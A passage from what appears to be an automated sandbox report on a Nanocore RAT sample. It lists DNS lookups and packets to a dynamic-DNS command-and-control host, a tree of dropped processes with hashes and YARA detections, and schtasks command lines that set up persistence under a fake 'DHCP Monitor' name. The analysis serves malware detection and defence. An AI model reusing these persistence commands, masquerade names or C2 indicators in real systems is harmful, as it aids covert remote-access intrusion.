              Oct 12, 2021 12:36:22.013202906 CEST4856249845185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:22.515898943 CEST4984548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:22.536120892 CEST4856249845185.19.85.175192.168.2.3
              Oct 12, 2021 12:36:23.047388077 CEST4984548562192.168.2.3185.19.85.175
              Oct 12, 2021 12:36:23.062324047 CEST4856249845185.19.85.175192.168.2.3

              UDP Packets


              DNS Queries

              | Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
              |---|---|---|---|---|---|---|---|
              | Oct 12, 2021 12:34:39.230012894 CEST | 192.168.2.3 | 8.8.8.8 | 0xa4c | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:34:50.479154110 CEST | 192.168.2.3 | 8.8.8.8 | 0x58ab | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:34:55.622173071 CEST | 192.168.2.3 | 8.8.8.8 | 0xbb40 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:17.085382938 CEST | 192.168.2.3 | 8.8.8.8 | 0x43bb | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:22.561073065 CEST | 192.168.2.3 | 8.8.8.8 | 0x608d | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:27.773935080 CEST | 192.168.2.3 | 8.8.8.8 | 0x600b | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:49.796987057 CEST | 192.168.2.3 | 8.8.8.8 | 0x64ec | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:55.119167089 CEST | 192.168.2.3 | 8.8.8.8 | 0x8c85 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:36:00.383613110 CEST | 192.168.2.3 | 8.8.8.8 | 0x52df | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:36:21.926038980 CEST | 192.168.2.3 | 8.8.8.8 | 0x5a76 | Standard query (0) | strongodss.ddns.net | A (IP address) | IN (0x0001) |

              DNS Answers

              | Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
              |---|---|---|---|---|---|---|---|---|---|
              | Oct 12, 2021 12:34:39.248326063 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4c | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:34:50.497493029 CEST | 8.8.8.8 | 192.168.2.3 | 0x58ab | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:34:53.358833075 CEST | 8.8.8.8 | 192.168.2.3 | 0x83cc | No error (0) | windowsupdate.s.llnwi.net | | 178.79.242.0 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:34:55.640309095 CEST | 8.8.8.8 | 192.168.2.3 | 0xbb40 | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:17.105237007 CEST | 8.8.8.8 | 192.168.2.3 | 0x43bb | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:22.577892065 CEST | 8.8.8.8 | 192.168.2.3 | 0x608d | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:27.793787956 CEST | 8.8.8.8 | 192.168.2.3 | 0x600b | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:49.817167997 CEST | 8.8.8.8 | 192.168.2.3 | 0x64ec | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:35:55.138731003 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c85 | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:36:00.402153969 CEST | 8.8.8.8 | 192.168.2.3 | 0x52df | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |
              | Oct 12, 2021 12:36:21.944379091 CEST | 8.8.8.8 | 192.168.2.3 | 0x5a76 | No error (0) | strongodss.ddns.net | | 185.19.85.175 | A (IP address) | IN (0x0001) |

              Code Manipulations

              System Behavior

              General

              Start time:12:34:10
              Start date:12/10/2021
              Path:C:\Users\user\Desktop\dAkJsQr7A9.exe
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\Desktop\dAkJsQr7A9.exe'
              Imagebase:0xca0000
              File size:1103745 bytes
              MD5 hash:B115228FE5E180F505C081AA829C1A86
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Start time:12:34:23
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\31956653\xmjk.pif' thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 37%, Metadefender
              • Detection: 56%, ReversingLabs
              Reputation:low

              General

              Start time:12:34:31
              Start date:12/10/2021
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x720000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.580231784.00000000057C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.580427027.0000000005900000.00000004.00020000.sdmp, Author: Florian Roth
              Antivirus matches:
              • Detection: 0%, Metadefender
              • Detection: 0%, ReversingLabs
              Reputation:high

              General

              Start time:12:34:36
              Start date:12/10/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7982.tmp'
              Imagebase:0xa10000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:12:34:36
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7CDE.tmp'
              Imagebase:0xa10000
              File size:185856 bytes
              MD5 hash:15FF7D8324231381BAD48A052F85DF04
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
              Imagebase:0x690000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:12:34:37
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:12:34:38
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):false
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:low

              General

              Start time:12:34:39
              Start date:12/10/2021
              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
              Imagebase:0x7f0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Antivirus matches:
              • Detection: 0%, Metadefender
              • Detection: 0%, ReversingLabs

              General

              Start time:12:34:40
              Start date:12/10/2021
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              General

              Start time:12:34:41
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):true
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

              General

              Start time:12:34:48
              Start date:12/10/2021
              Path:C:\Windows\System32\wscript.exe
              Wow64 process (32bit):false
              Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\31956653\Update.vbs'
              Imagebase:0x7ff752ac0000
              File size:163840 bytes
              MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Start time:12:34:50
              Start date:12/10/2021
              Path:C:\Users\user\31956653\xmjk.pif
              Wow64 process (32bit):false
              Commandline:'C:\Users\user\31956653\xmjk.pif' C:\Users\user\31956653\thjfdg.xcp
              Imagebase:0x3f0000
              File size:776432 bytes
              MD5 hash:279DAE7236F5F2488A4BACDE6027F730
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              General

              Start time:12:34:51
              Start date:12/10/2021
              Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              Imagebase:0x7f0000
              File size:45152 bytes
              MD5 hash:2867A3817C9245F7CF518524DFD18F28
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, Author: Florian Roth
